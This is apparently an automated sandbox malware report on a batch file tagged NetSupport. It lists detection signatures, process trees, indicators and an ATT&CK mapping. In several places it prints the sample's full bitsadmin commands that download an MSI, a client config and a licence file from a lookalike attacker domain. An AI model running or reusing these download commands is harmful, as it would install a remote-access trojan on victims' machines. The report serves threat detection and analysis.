Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EDM8nAR.bat

Overview

General Information

Sample name:EDM8nAR.bat
Analysis ID:1632649
MD5:9e4466ae223671f3afda11c6c1e107d1
SHA1:438b65cb77e77a41e48cdb16dc3dee191c2729c7
SHA256:ab289a1dc9ad423e385c539a539feec8c04604d17656c663e52e02ceebd4409f
Tags:batNetSupportuser-aachum
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Tries to download files via bitsadmin
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use Short Name Path in Command Line

Classification

  • System is w10x64
  • cmd.exe (PID: 6156 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\EDM8nAR.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • fltMC.exe (PID: 6328 cmdline: fltmc MD5: 6AB08CADCE7DF971A043DCD1257D7374)
    • bitsadmin.exe (PID: 6372 cmdline: bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi" MD5: 01AAB62D5799F75B0D69EB29C1CA6855)
    • bitsadmin.exe (PID: 5808 cmdline: bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini" MD5: 01AAB62D5799F75B0D69EB29C1CA6855)
    • bitsadmin.exe (PID: 3804 cmdline: bitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\user~1\AppData\Local\Temp\vrep_install\NSM.lic" MD5: 01AAB62D5799F75B0D69EB29C1CA6855)
  • svchost.exe (PID: 6440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi", CommandLine: bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi", CommandLine|base64offset|contains: n+li, Image: C:\Windows\System32\bitsadmin.exe, NewProcessName: C:\Windows\System32\bitsadmin.exe, OriginalFileName: C:\Windows\System32\bitsadmin.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\EDM8nAR.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6156, ParentProcessName: cmd.exe, ProcessCommandLine: bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi", ProcessId: 6372, ProcessName: bitsadmin.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6440, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://authenticatior.com/vrep.msiAvira URL Cloud: Label: malware
Source: EDM8nAR.batVirustotal: Detection: 8%Perma Link
Source: Joe Sandbox ViewASN Name: WORLDSTREAMNL WORLDSTREAMNL
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: authenticatior.com
Source: svchost.exe, 00000004.00000002.2103228272.000002A1D5811000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: bitsadmin.exe, 00000006.00000002.1635743396.00000204B19D0000.00000004.00000020.00020000.00000000.sdmp, EDM8nAR.bat, edb.log.4.drString found in binary or memory: https://authenticatior.com/Client32.ini
Source: bitsadmin.exe, 00000006.00000002.1635743396.00000204B19DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticatior.com/Client32.iniC:
Source: bitsadmin.exe, 00000006.00000002.1635743396.00000204B19F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticatior.com/Client32.iniLMEMPH
Source: bitsadmin.exe, 0000000D.00000002.2007122246.0000020C5DDE0000.00000004.00000020.00020000.00000000.sdmp, EDM8nAR.bat, edb.log.4.drString found in binary or memory: https://authenticatior.com/NSM.lic
Source: svchost.exe, 00000004.00000002.2103422714.000002A1D58C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticatior.com/NSM.lic6fb2b
Source: bitsadmin.exe, 0000000D.00000002.2007122246.0000020C5DDE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticatior.com/NSM.licC:
Source: svchost.exe, 00000004.00000002.2102733955.000002A1D0B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticatior.com/NSM.licini
Source: svchost.exe, 00000004.00000002.2102733955.000002A1D0B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticatior.com/NSM.licson
Source: svchost.exe, 00000004.00000002.2102733955.000002A1D0B13000.00000004.00000020.00020000.00000000.sdmp, EDM8nAR.bat, edb.log.4.drString found in binary or memory: https://authenticatior.com/vrep.msi
Source: bitsadmin.exe, 00000003.00000002.1262147479.00000287664E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticatior.com/vrep.msi;;C:
Source: bitsadmin.exe, 00000003.00000002.1262147479.00000287664E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticatior.com/vrep.msiC:
Source: bitsadmin.exe, 00000003.00000002.1262147479.00000287664E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticatior.com/vrep.msiLMEMH
Source: svchost.exe, 00000004.00000002.2103350733.000002A1D588B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://authenticatior.com:443/NSM.lic
Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000004.00000003.839821770.000002A1D5640000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: qmgr.db.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: classification engineClassification label: mal60.evad.winBAT@11/5@1/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user~1\AppData\Local\Temp\vrep_installJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\EDM8nAR.bat" "
Source: C:\Windows\System32\fltMC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: EDM8nAR.batVirustotal: Detection: 8%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\EDM8nAR.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fltMC.exe fltmc
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\user~1\AppData\Local\Temp\vrep_install\NSM.lic"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fltMC.exe fltmcJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\user~1\AppData\Local\Temp\vrep_install\NSM.lic"Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\fltMC.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\System32\fltMC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\bitsadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32Jump to behavior

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\user~1\AppData\Local\Temp\vrep_install\NSM.lic"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\user~1\AppData\Local\Temp\vrep_install\NSM.lic"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6528Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: svchost.exe, 00000004.00000002.2102371712.000002A1D022B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2103321467.000002A1D585B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fltMC.exe fltmcJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\user~1\AppData\Local\Temp\vrep_install\NSM.lic"Jump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
BITS Jobs
11
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
1
DLL Side-Loading
2
Virtualization/Sandbox Evasion
LSASS Memory2
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
Logon Script (Windows)1
BITS Jobs
Security Account Manager21
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632649 Sample: EDM8nAR.bat Startdate: 08/03/2025 Architecture: WINDOWS Score: 60 21 authenticatior.com 2->21 27 Antivirus detection for URL or domain 2->27 29 Multi AV Scanner detection for submitted file 2->29 7 cmd.exe 2 2->7         started        10 svchost.exe 1 4 2->10         started        signatures3 process4 dnsIp5 31 Tries to download files via bitsadmin 7->31 13 conhost.exe 7->13         started        15 bitsadmin.exe 1 7->15         started        17 bitsadmin.exe 1 7->17         started        19 2 other processes 7->19 23 authenticatior.com 5.252.155.19, 443, 49684, 49685 WORLDSTREAMNL Russian Federation 10->23 25 127.0.0.1 unknown unknown 10->25 signatures6 process7

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
EDM8nAR.bat11%ReversingLabsScript-PowerShell.Trojan.Heuristic
EDM8nAR.bat8%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://authenticatior.com/NSM.licson0%Avira URL Cloudsafe
https://authenticatior.com/vrep.msi;;C:0%Avira URL Cloudsafe
https://authenticatior.com/NSM.licini0%Avira URL Cloudsafe
https://authenticatior.com/NSM.licC:0%Avira URL Cloudsafe
https://authenticatior.com/vrep.msi100%Avira URL Cloudmalware
https://authenticatior.com/Client32.iniLMEMPH0%Avira URL Cloudsafe
https://authenticatior.com/Client32.iniC:0%Avira URL Cloudsafe
https://authenticatior.com/vrep.msiLMEMH0%Avira URL Cloudsafe
https://authenticatior.com/vrep.msiC:0%Avira URL Cloudsafe
https://authenticatior.com/Client32.ini0%Avira URL Cloudsafe
https://authenticatior.com/NSM.lic0%Avira URL Cloudsafe
https://authenticatior.com/NSM.lic6fb2b0%Avira URL Cloudsafe
https://authenticatior.com:443/NSM.lic0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
authenticatior.com
5.252.155.19
truetrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://g.live.com/odclientsettings/Prod1C:edb.log.4.drfalse
      high
      https://authenticatior.com/NSM.licsonsvchost.exe, 00000004.00000002.2102733955.000002A1D0B13000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://authenticatior.com/vrep.msi;;C:bitsadmin.exe, 00000003.00000002.1262147479.00000287664E7000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://authenticatior.com/Client32.iniC:bitsadmin.exe, 00000006.00000002.1635743396.00000204B19DB000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://authenticatior.com/NSM.licC:bitsadmin.exe, 0000000D.00000002.2007122246.0000020C5DDE7000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://authenticatior.com/NSM.licinisvchost.exe, 00000004.00000002.2102733955.000002A1D0B13000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://authenticatior.com/vrep.msiLMEMHbitsadmin.exe, 00000003.00000002.1262147479.00000287664E7000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
